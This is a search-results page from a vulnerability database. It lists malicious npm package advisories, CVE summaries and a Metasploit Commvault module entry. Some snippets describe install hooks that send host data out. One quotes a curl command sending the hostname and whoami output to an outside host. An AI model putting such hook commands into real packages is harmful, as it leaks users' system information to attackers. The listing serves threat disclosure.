Lucene search
K

14 matches found

OSV
OSV
added 2026/06/16 2:52 p.m.6 views

MAL-2026-5891 Malicious code in atlassian-forge-skills (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c Package impersonates an internal Atlassian Forge dependency unscoped name atlassian-forge-skills, description 'Internal package', generic author...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/16 2:52 p.m.9 views

Malicious code in atlassian-forge-skills (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ca0f4b99cda621977551550ed678ad77ee82827714acb9d08534f53b0642e3c Package impersonates an internal Atlassian Forge dependency unscoped name atlassian-forge-skills, description 'Internal package', generic author...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/06/15 11:26 a.m.8 views

MAL-2026-5830 Malicious code in unico-check (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1945d7aee54e60800e30f150e6db8042fa3aee9ea99f6b5a4ab14e2a1c26571d package.json declares a preinstall lifecycle hook that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f, passing the...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 12:23 p.m.17 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/06/13 12:23 p.m.12 views

MAL-2026-5749 Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSV
OSV
added 2026/06/10 6:23 p.m.11 views

MAL-2026-5521 Malicious code in @helpcentre/tesco-help (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector eb75510e87a08a5152331461c2b2b955ad21d418c8d2055f5f66ec15e22cf042 On npm install, the postinstall hook runs node index.js, which performs an HTTPS POST to https://f1ackavab3.execute-api.eu-west-2.amazonaws.com/...

5.8AI score
Exploits0References2
OSV
OSV
added 2026/06/09 5:35 p.m.10 views

MAL-2026-5417 Malicious code in @klapp-sca/routes (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 495f510483f297a56d545e8555db20eb54569f904bfd71853e54a18d89812cb0 package.json declares "preinstall": "node index.js || true", so on every npm install the bundled index.js runs automatically and collects os.hostname...

5.5AI score
Exploits0References2
OSV
OSV
added 2026/06/09 5:16 p.m.10 views

MAL-2026-5435 Malicious code in ac_semantic-ui_ts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f8b97f7d3e69494d0415e13aec8d9d51ce1f5912d8c1de45a1e563e2d1b01d3d package.json declares a postinstall hook that runs canary.js, which issues an HTTP GET to bare IP 157.230.17.236 on port 80 with query parameters...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/14 7:25 p.m.12 views

Malicious code in @pelmnaads/naads-common-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68990dfacdc750bf464d646aca4855c2dd23bbefcadef1d9638e2d663a23fc57 The package is published to the public npm registry under @pelmnaads/naads-common-logger with version 19999.0.1 — the canonical dependency-confusion...

5.8AI score
Exploits0References1
RedhatCVE
RedhatCVE
added 2026/03/26 3:13 p.m.5 views

CVE-2025-13995

IBM QRadar SIEM 7.5.0 through 7.5.0 Update Package 14 could allow an attacker with access to one tenant to access hostname data from another tenant's account...

5CVSS5.8AI score0.0018EPSS
Exploits0References1
CNNVD
CNNVD
added 2026/03/11 12:0 a.m.6 views

curl 安全漏洞

curl is an open-source tool developed by cURL for transferring data from or to a server. Curl has a security vulnerability that arises from the use of OAuth2 bearer tokens for HTTPS transfers. In some cases, this vulnerability may lead to the token being leaked to another hostname...

5.3CVSS7.1AI score0.00333EPSS
Exploits1References5
Metasploit
Metasploit
added 2025/09/17 6:53 p.m.719 views

Commvault Command-Line Argument Injection to Traversal Remote Code Execution

This module exploits an unauthenticated remote code execution exploit chain for Commvault, tracked as CVE-2025-57790 and CVE-2025-57791. A command-line injection permits unauthenticated access to the 'localadmin' account, which then facilitates code execution via expression language injection...

8.8CVSS7.9AI score0.83641EPSS
Exploits12
ATTACKERKB
ATTACKERKB
added 2022/04/13 6:15 p.m.6 views

CVE-2022-22961

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. A malicious actor with remote access may leak the hostname of the target system. Successful exploitation of this issue can lead to targeting...

5.3CVSS7AI score0.00813EPSS
Exploits1References2
Cvelist
Cvelist
added 2022/04/13 5:5 p.m.37 views

CVE-2022-22961

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an information disclosure vulnerability due to returning excess information. A malicious actor with remote access may leak the hostname of the target system. Successful exploitation of this issue can lead to targeting...

5.7AI score0.00813EPSS
Exploits1References1
Rows per page
Query Builder